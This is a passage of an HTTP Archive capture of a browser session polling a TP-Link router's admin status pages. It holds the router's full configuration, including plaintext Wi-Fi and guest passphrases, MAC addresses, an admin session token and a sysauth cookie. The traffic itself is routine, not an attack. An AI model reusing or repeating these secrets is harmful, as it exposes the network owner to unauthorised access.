\"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 267,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 704,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:39.651+03:00\",\r\n \"time\": 1827,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 262,\r\n \"dns\": 251,\r\n \"connect\": 530,\r\n \"send\": 0,\r\n \"wait\": 784,\r\n \"receive\": 0\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:49.649+03:00\",\r\n \"time\": 944,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 649,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:49.654+03:00\",\r\n \"time\": 1787,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 251,\r\n \"connect\": 518,\r\n \"send\": 0,\r\n \"wait\": 752,\r\n \"receive\": 0\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:59.649+03:00\",\r\n \"time\": 976,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": 